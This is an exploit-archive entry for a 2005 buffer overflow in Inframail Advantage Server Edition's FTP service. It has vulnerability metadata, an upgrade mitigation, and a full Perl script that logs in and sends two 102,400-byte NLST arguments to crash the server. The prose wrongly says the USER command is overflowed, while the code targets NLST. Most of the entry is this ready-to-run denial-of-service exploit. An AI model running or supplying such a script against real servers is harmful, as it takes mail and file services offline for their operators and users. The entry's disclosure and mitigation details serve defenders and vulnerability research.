Inframail_FTPOverflow.pl

vendor:

Inframail Advantage Server Edition

by:

milw0rm.com

7.5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Inframail Advantage Server Edition

Affected Version From: 6

Affected Version To: 6.37

Patch Exists: YES

Related CWE: N/A

CPE: a:infradig_systems:inframail_advantage_server_edition

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2005

This exploit is for Infradig Systems Inframail Advantage Server Edition 6.0 (Version: 6.37). It attempts to kill the FTP server by sending a USER command with a large number of 'A' characters as a parameter. This causes a buffer overflow and the server crashes.

Mitigation:

Upgrade to the latest version of Inframail Advantage Server Edition

Source

Exploit-DB raw data:

#===== Start Inframail_FTPOverflow.pl =====
#
# Usage: Inframail_FTPOverflow.pl <ip>
#        Inframail_FTPOverflow.pl 127.0.0.1
#
# Infradig Systems Inframail Advantage Server Edition 6.0
# (Version: 6.37)
#
# Download:
# http://www.infradig.com/
#
#########################################################

use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                    PeerPort => "21",
                                    Proto    => "TCP"))
{
        print "Attempting to kill Inframail FTP server at $ARGV[0]:21...";

        sleep(1);

        print $socket "USER hello\r\n";

        sleep(1);

        print $socket "PASS moto\r\n";

        sleep(1);

        print $socket "NLST " . "A" x 102400 . "\r\n";

        sleep(1);

        print $socket "NLST " . "A" x 102400 . "\r\n";

        close($socket);
}
else
{
        print "Cannot connect to $ARGV[0]:21\n";
}
#===== End Inframail_FTPOverflow.pl =====

# milw0rm.com [2005-06-27]